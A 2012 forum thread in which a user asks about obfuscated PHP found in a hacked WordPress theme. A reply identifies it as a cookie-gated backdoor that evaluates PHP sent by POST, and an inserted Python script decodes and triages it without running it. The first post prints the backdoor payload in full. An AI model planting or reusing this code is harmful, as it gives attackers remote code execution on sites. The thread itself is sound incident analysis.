Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 1:46 pm
by mecha_godzilla
Hi,

A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd party sites into an iframe in the main template but the fourth file (index.php) has the following code right at the top:

Code:

preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');
Anyone have any idea how to "decode" this, or work out what it's doing?

Thanks in advance,

Mecha Godzilla

Re: Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 2:30 pm
by requinix
The /e flag tells preg_replace() to evaluate the replacement string as PHP code. That's the first warning that it's malicious.

There are only two layers of obfuscation, the second being a common eval(base64_decode(...)). The result is something which allows someone with $_COOKIE["v"] == "d" to see a form which allows them to submit and evaluate PHP code.
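
A static way to peel both layers described above without executing any of the PHP, as an added example that is not part of the original posts: it resolves the \xHH escapes of the replacement string, base64-decodes the inner literal and reports what the result does. The function names unwrap() and triage() and the wording of the findings are my own; the sample input is the injected line quoted in the first post.

```python
"""Statically unwrap a preg_replace("/.../e", "...") dropper; no PHP is ever executed."""
import base64
import re

# The injected line from the top of index.php, copied from the post (used here as sample input).
SAMPLE = r'''preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');'''

PHP_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", '"': '"', "$": "$"}

def unescape_php_double_quoted(s: str) -> str:
    """Resolve the escapes PHP honours in a double-quoted literal: \\xHH (1-2 hex digits) and the simple ones."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return PHP_ESCAPES.get(m.group(2), "\\" + m.group(2))  # unknown escapes stay literal, as in PHP
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})|\\(.)', repl, s)

def unwrap(line: str) -> dict:
    """Peel both layers: pattern modifiers, the decoded replacement string, and the base64 payload inside it."""
    m = re.search(r'preg_replace\(\s*"([^"]*)"\s*,\s*"((?:[^"\\]|\\.)*)"', line)
    if not m:
        raise ValueError("no preg_replace() with a double-quoted pattern and replacement found")
    pattern, raw_replacement = m.group(1), m.group(2)
    modifiers = pattern.rsplit("/", 1)[1]          # everything after the closing delimiter, e.g. "esi"
    replacement = unescape_php_double_quoted(raw_replacement)
    payload = None
    b = re.search(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)", replacement)
    if b:
        payload = base64.b64decode(b.group(1)).decode("utf-8", "replace")
    return {"eval_modifier": "e" in modifiers, "replacement": replacement, "payload": payload}

def triage(line: str) -> list:
    """Name the behaviours visible in the unwrapped code so the file can be classified without running it."""
    r = unwrap(line)
    findings = []
    if r["eval_modifier"]:
        findings.append("preg_replace /e modifier: the replacement string is executed as PHP")
    p = r["payload"] or ""
    gate = re.search(r"\$_COOKIE\['(\w+)'\]\s*==\s*'(\w+)'", p)
    if gate:
        findings.append(f"access gated on cookie {gate.group(1)}={gate.group(2)}")
    if re.search(r"eval\(\s*\$\w+\s*\)", p) and "$_POST[" in p:
        findings.append("eval() of POST-supplied data: remote code execution backdoor")
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The same unwrap() works on any dropper of this shape; when base64_decode() is absent, payload is None and only the /e finding is reported.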

Re: Strange PHP code in Wordpress theme

Posted: Wed Nov 21, 2012 2:41 pm
by mecha_godzilla
Ok, that sounds about as ominous as I was expecting :mrgreen:

Thanks for your help,

M_G